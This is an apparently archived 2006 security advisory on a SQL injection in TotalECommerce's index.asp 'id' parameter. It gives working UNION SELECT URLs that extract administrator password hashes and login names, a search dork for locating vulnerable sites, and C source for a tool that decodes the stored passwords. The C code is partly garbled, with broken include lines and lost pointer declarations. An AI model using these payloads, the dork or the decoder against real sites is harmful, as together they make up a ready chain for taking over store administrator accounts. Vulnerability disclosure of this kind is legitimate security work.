Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.

2006-03-05T00:00:00
ID SECURITYVULNS:DOC:11701
Type securityvulns
Reporter Securityvulns
Modified 2006-03-05T00:00:00

Description

--Security Report-- Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.


Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 04/03/06 04:36 AM

Contacts:{ ICQ: 10072 MSN/Email: nukedx@nukedx.com Web: http://www.nukedx.com }


Vendor: TotalECommerce (http://www.totalecommerce.com) Version: 1.0 and prior version must be affected. About: Via this method remote attacker can inject arbitrary SQL queries to id parameter in index.asp Level: Critical


How&Example: GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL] EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha+from+administradores EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login, login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login, login,login,login,login,login,login,login+from+administradores with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name [PageID]: must be working page id you can get some from frontpage.


Timeline: * 04/03/2006: Vulnerability found. * 04/03/2006: Could not contact with vendor. * 04/03/2006: File closed.


Exploit&Decrypter: http://www.nukedx.com/?getxpl=18


Dorks: intext:"totalecommerce"

Original advisory: http://www.nukedx.com/?getxpl=18


Decrypter source in C

/****** * TotalECommerce PWD Decrypter * Coded by |SaMaN| for nukedx * http://www.k9world.org * IRC.K9World.Org * *Advisory: http://www.nukedx.com/?viewdoc=18 * ********/

include <stdio.h>

include <stdlib.h>

include <string.h>

int main() { char buf[255]; char buf2[255]; char buf3[255]; char texto; char vcrypt; int i,x,z,t = 0; char saman; texto = buf; vcrypt = buf2; printf("%s", "|=------------------------------------=|\n"); printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n"); printf("%s", "|=------------------------------------=|\n\n"); printf("%s", "Enter crypted password: "); scanf("%200s", buf); if (!texto) vcrypt = "";

for (i = 0; i < strlen(texto); i++) { if ((vcrypt == "") || (i > strlen(texto))) x = 1; else x = x + 1; t = buf[i]; z = 255 - t; saman = toascii(z); snprintf(buf3, 250, "%c", saman); strncat(buf2, buf3, 250); } printf("Result: %s\n", buf2); return; } ---End of code--- Greets to: |SaMaN|